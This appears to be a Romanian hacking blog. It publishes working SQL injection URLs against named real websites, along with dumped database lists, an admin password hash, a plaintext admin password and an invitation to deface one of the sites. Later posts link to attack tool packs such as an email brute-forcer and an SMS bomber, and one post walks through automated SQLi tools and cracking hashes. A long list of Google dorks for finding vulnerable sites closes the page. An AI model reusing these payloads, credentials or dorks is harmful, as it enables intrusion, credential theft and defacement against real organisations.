KingsCollege.es SLQi

3 comentarii

Vulnerable Parameter

http://www.kingscollege.es/news.php?idnew=2+and+1=0+ Union Select  1 ,2,3,4,5,6,7, UNHEX(HEX([visible])) ,9,10,11,12,13,14

Site Info:
Server = Apache/1.3.33 (Debian GNU/Linux)
Current User = root@localhost
Current Database = kingscollege_v2
Databases

agenda
 agenda
 atutor
 atutor2
 bisw
 bsa
 bsamoodle
 classbank
 classbsalican
 classbsbeij
 classclient
 classdemo
 classelgg
 classkclamor
 classkcmurcia
 classkings
 classkings2
 classktlamor
 classmayfair
 classmoodle
 classpedro
 classsite
 classsjhend
 classstmic
 classtrainp
 cobis
 cobisec
 collabtive
 comerciales
 filemanager
 fundacionHB
 fundacionHB_test
 kcmurcia
 kgi
 kgi2
 ki2
 kigallery
 kings
 kingscollege_v2
 kingsgroup
 kingstraining
 kt2
 kt2007
 kt2008
 kt2009
 kt2010
 kt2010_2
 kt333
 limesurvey
 mahara
 mediaAlicante
 michaels
 moodle
 [U]mysql[/U]
 newcobis
 ocomon
 pruebas_db
 rrhh
 rrhh2
 school_alicante
 school_china
 school_england
 school_madrid
 school_murcia
 stm_workshop
 surveyskg
 sympa
 test_cobis
 [U]wordpress[/U]

WORDPRESS :

user:admin – password:user_pass:
$P$BliHBgt.IP1zaskw8A7klkyATtayN2/

R.N.S – Deface this site too.

Reclame

aifestival.org [SQLi]

Lasă un comentariu

Target:http://www.aifestival.org/%5DAspen Ideas Festival Welcome to Aspen Ideas Festival
Vulnerable Parameter:

http://www.aifestival.org/fellows.php?year=2008&id=4+and+1=5+union+all+select+1,2,3,4,5,6,7
http://www.aifestival.org/fellows.php?year=2008&id=4+and+1=0+ Union Select  1 , UNHEX(HEX([visible])) ,3,4,5,6,7

Server Information:
Server = Apache
User = dbo279998374@74.208.16.94
Database = db279998374
Columns = 7

Tables:
aliases
contact
content
fellows
festivals
galleries
gallery
news
pages
persons
persons_types
persons_years
pictures
program_tracks
program_tracks_types
public_programs
quickclips
registration
schedule
speakers_and_moderators
sponsors
staff
subscribe
uploads
video_category
videos-bak1
videos

Vizal.ro SQLi

Lasă un comentariu

  • Database – vizalro_vizalro
  • Tables: axs ; comanda ; categorii ; cosh ; foto ; links ; newsletter ; portofoliu ; produse ; promotii ; servicii ; temp ; subcategorii

– axs dumped
admin – impirmapeorice
Parametrul vulnerabil:

Code:
http://vizal.ro/index.php?f=subservicii&id=2+and+1=3+union+all+select+1-

Cele mai des întâlnite Tabele şi COLOANE SQLi

Lasă un comentariu

Mi-a venit ideea postului când mi-am adus aminte de un prieten care căuta sql manual şi nu găsea deloc numele tabelelor.M-am gândit să vă pun aici o listă cu majoritatea tabelelor şi coloanelor şi cele mai des întâlnite.

Cele mai des intalnite Tabele:

http://www.fileshare.ro/3425444727.01

Cele mai des intalnite coloane.

http://www.fileshare.ro/3425477835.12

Sper sa va fie de folos.Sunt coloanele si tabelele din SQLi Helper si am mai adaugat si eu cateva.

Reiluke Bruteforce Tools

Lasă un comentariu

Acest pack contine:

  • Admin Finder – dupa linkul vulnerabil , cauta directorul adminului.Prin bruteforce.
  • Blind SQLi
  • Duplicate Remover – sterge fisierele cu acelasi nume sau format
  • Email Bruteforcer ( Yahoo! sau Gmail ).Pe Gmail permite incercarea eronata a mai multor parole dar pe Yahoo! nu,aveti acolo si cateva Proxy-uri si lista  mea de posibile parole 183.308 parole.Incluzand numere.
  • Email Checker
  • Exploit Scanner – Scaneaza un anumit dork de posibilele exploituri.La SQLi/RFI/LFI sau XSS.
  • Pangolin Free Edition  – sHHST
  • Rapidshare Checker
  • SMS Bomber – Trimite SMS-uri in continuu catre un numar.Selectati numarul mesajelor,mesajul etc.
  • SQL Helper / SQLi Helper 2.7 – Automatic SQL injection tool
  • Steam Checker – Verifica contul STEAM

Sper sa va fie de ajutor.

http://www.2shared.com/file/11070716/7c30d7be/Reiluke_Hacking_Tools.html

Automatic SQL Injection Tools

2 comentarii

Mulţi dintre voi folosiţi programe care injectează automat codul într-un link vulnerabil.Ca şi la sqli dorks,mulţi te consideră l33t dacă foloseşti asemnea programe.Cel mai bine este să înveţi SQL.Asemenea programe fac un lucru aparent simplu,ele injectează anumite „stringuri” în browser

Ex:Dacă am un site vulnerabil de forma http://sitename.ro/photos.phpid=200

Programul nu face decât să însereze automat în link    and+1=1 ; and+1=2 până când pagina cu eroare dispare,înserând  o sintaxa falsă.Ce-i drept,multe dintre programele de sql injection au şi funcţia Dump

Funcţia dump arată ce este într-o bază de date,într-un anumit tabel sau coloană.Cu această funcţie,de obicei,se obţin informaţii despre uşeri şi parole.Acestea se află cel mai des în tabele asemănătoare cu acestea:

login_admin
login_admins
login_user
login_users
Logins
Protokolle
lost_pass
lost_passwords
lostpass
lostpasswords

Majoritatea parolelor sunt ascunse sub un hash,majoritatea hash-urilor sunt,în general,MD5 dar tipul hash-ului diferă de la site la site.Aceste hash-uri se pot decripta uşor ( sau mai greu,dacă sunt mai grele întrebaţi-l pe begood) cu un decrypter ( sunt sute pe net )

Un hash MD5 arată cam aşa

9a8610ea2b8432f97f2cbb0938165268

iar textul ascuns sub acest hash este ” sympleboy22 ” .Puteţi verifica uşor cu orice decrypter.

Programele de SQLi Automat sunt foarte folositoare şi uşor de utilizat.Îţi oferă toate datele mult mai uşor şi mult mai vizibil decât ai face-o dacă ai injecta manual în browser.Sunt însă site-uri care sunt vulnerabile la SQL şi nu sunt detectate de asemenea programe pentru că nu se potrivesc cu sintaxele pe care programul le înserează.

Cele mai populare Automatic SQL Injection Tools sunt :

SQL MAP

Acunetix Scanner

SQLi Helper

Pangolin

Absinthe

–––––-

SQL Map este de departe cel mai bun,pentru că are la dispoziţie foarte multe sintaxe şi este puţin probabil să rateze un site vulnerabil şi totuşi este mai greu de rulat.Trebuie rulat cu Python din câte ştiu eu.

–––––-

Acunetix Scanner – Acesta este foarte bun dar are şi un defect,defapt 2:

1:Nu este free,nu prea poţi face nimic dacă nu este activat

2:Nu injectează,nu exploatează ci doar SCANEAZ şi arată că site-ul este sau nu vulnerabil.

Are şi avantaje,scanează site-ul ţintă de orice tip de vulnerabilitate până şi XSS.

–––––-

SQLi Helper – este un program extrem de uşor de utilizat.Are opţiuni simple şi precise precum:

Get Database – Get Tables – Get Colums – Admin Finder – Dump

Este cel mai uşor de folosit dar nu prea detectează toate site-urile.După părerea mea cam 70% din site-urile vulnerabile le detectează.

–––––-

Pangolin – Pangolin  este cel mai popular tool de acest gen,are o grafică excelentă ceea ce nu pot spune şi despre celelalte programe.Este folosit de mulţi împătimiţi şi oferă informaţii clare.

–––––-

Absinthe – nu prea l-am folosit dar arată destul de bine.

Cam atât,sper că v-a ajutat acest mini tutorial.

Acest articol a fost scris NUMAI pentru https://sympleboy22.wordpress.com şi http://rstcenter.com
Dacă postaţi acest articol pe alt website va rugăm să precizaţi sursa.

Autor:Sympleboy22

SQLi Dorks

Lasă un comentariu

Am vazut multi ” hackeri ” care cauta site-uri vulnerabile SQL,MSSQL,RFI,LFI dupa dork.Bine,acestea sunt doar pentru SQL.

Dork-urile sunt terminatiile linkurilor sau subdomeniilor acestora.

Dork-urile vulnerabile la sqli sunt de obicei de forma http://sitename.ro/index.phpid=10

Unde dorkul este index.phpid=10,dar sunt foarte multe dork-uri,unele chiar ciudate.

Pentru a usura gasirea site-urilor vulnerabile SQL,tastati simplu pe Google ” inurl:index.phpid=” si google va returna toate rezultatele ( site-urile ) care au asemenea terminatii in link si sunt posibil vulnerabile.

Uni „hackeri” care sparg site-uri dupa dork sunt considerati l33t,NU este adevarat,nu conteaza unde cum sau cand ai gasit site-ul,poti gasi si site-uri mari dupa dork vulnerabile dar oricum nu trebuie nimeni sa stie ca tu folosesti dork search.

Aveti mai jos o lista cu cele mai folosite dork-uri.

Dork Sqli By Shafiq

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

Dupa cum ati observat,nu toate dork-urile contin index.php si daca stati sa le cautati pe google sunt extrem de multe site-uri care folosesc asemenea dork-uri.

Happy Cracking 🙂

Older Entries